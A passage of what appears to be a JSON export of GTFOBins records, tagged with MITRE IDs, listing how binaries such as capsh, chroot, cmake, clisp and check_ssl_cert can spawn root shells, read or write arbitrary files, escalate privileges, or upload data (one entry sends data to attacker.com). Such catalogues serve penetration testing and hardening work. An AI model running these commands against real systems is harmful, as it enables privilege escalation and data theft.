/path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/byebug/"]},{"id":"gtfo:bzip2:file-read:0:sudo","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:bzip2:file-read:0:suid","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:bzip2:file-read:0:unprivileged","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:cabal:shell:0:sudo","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cabal:shell:0:suid","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cabal:shell:0:unprivileged","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cancel:upload:0:sudo","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:cancel:upload:0:suid","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:cancel:upload:0:unprivileged","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:capsh:shell:0:sudo","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:capsh:shell:0:suid","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --gid=0 --uid=0 --","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:capsh:shell:0:unprivileged","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:cargo:inherit:0:sudo","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cargo/"]},{"id":"gtfo:cargo:inherit:0:unprivileged","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cargo/"]},{"id":"gtfo:cat:file-read:0:sudo","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cat:file-read:0:suid","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cat:file-read:0:unprivileged","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cdist:shell:0:sudo","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cdist/"]},{"id":"gtfo:cdist:shell:0:unprivileged","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cdist/"]},{"id":"gtfo:certbot:shell:0:sudo","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/certbot/"]},{"id":"gtfo:certbot:shell:0:unprivileged","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/certbot/"]},{"id":"gtfo:chattr:privilege-escalation:0:sudo","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chattr/"]},{"id":"gtfo:chattr:privilege-escalation:0:suid","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chattr/"]},{"id":"gtfo:check_by_ssh:shell:0:sudo","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"]},{"id":"gtfo:check_by_ssh:shell:0:unprivileged","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"]},{"id":"gtfo:check_cups:file-read:0:sudo","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_cups/"]},{"id":"gtfo:check_cups:file-read:0:unprivileged","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_cups/"]},{"id":"gtfo:check_log:file-read:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-read:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-write:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-write:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_memory:file-read:0:sudo","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_memory/"]},{"id":"gtfo:check_memory:file-read:0:unprivileged","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_memory/"]},{"id":"gtfo:check_raid:file-read:0:sudo","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_raid/"]},{"id":"gtfo:check_raid:file-read:0:unprivileged","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_raid/"]},{"id":"gtfo:check_ssl_cert:shell:0:sudo","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"]},{"id":"gtfo:check_ssl_cert:shell:0:unprivileged","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"]},{"id":"gtfo:check_statusfile:file-read:0:sudo","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"]},{"id":"gtfo:check_statusfile:file-read:0:unprivileged","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"]},{"id":"gtfo:chmod:privilege-escalation:0:sudo","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chmod/"]},{"id":"gtfo:chmod:privilege-escalation:0:suid","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chmod/"]},{"id":"gtfo:choom:shell:0:sudo","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:choom:shell:0:suid","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:choom:shell:0:unprivileged","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:chown:privilege-escalation:0:sudo","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chown/"]},{"id":"gtfo:chown:privilege-escalation:0:suid","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chown/"]},{"id":"gtfo:chroot:shell:0:sudo","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot /","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chroot/"]},{"id":"gtfo:chroot:shell:0:suid","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chroot/"]},{"id":"gtfo:chrt:shell:0:sudo","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:chrt:shell:0:suid","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh -p","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:chrt:shell:0:unprivileged","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:clamscan:file-read:0:sudo","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clamscan:file-read:0:suid","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clamscan:file-read:0:unprivileged","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clisp:shell:0:sudo","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:clisp:shell:0:suid","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:clisp:shell:0:unprivileged","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:cmake:file-read:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:file-read:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:shell:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmake:shell:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"]},{"id":"gtfo:cmp:file-read:0:sudo","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cmp:file-read:0:suid","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cmp:file-read:0:unprivileged","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmp/"]},{"id":"gtfo:cobc:shell:0:sudo","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:cobc:shell:0:suid","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:cobc:shell:0:unprivileged","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cobc/"]},{"id":"gtfo:code:download:0:sudo","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:download:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:reverse-shell:0:sudo","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:reverse-shell:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"]},{"id":"gtfo:code:upload:0:sudo","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"code tunnel --name 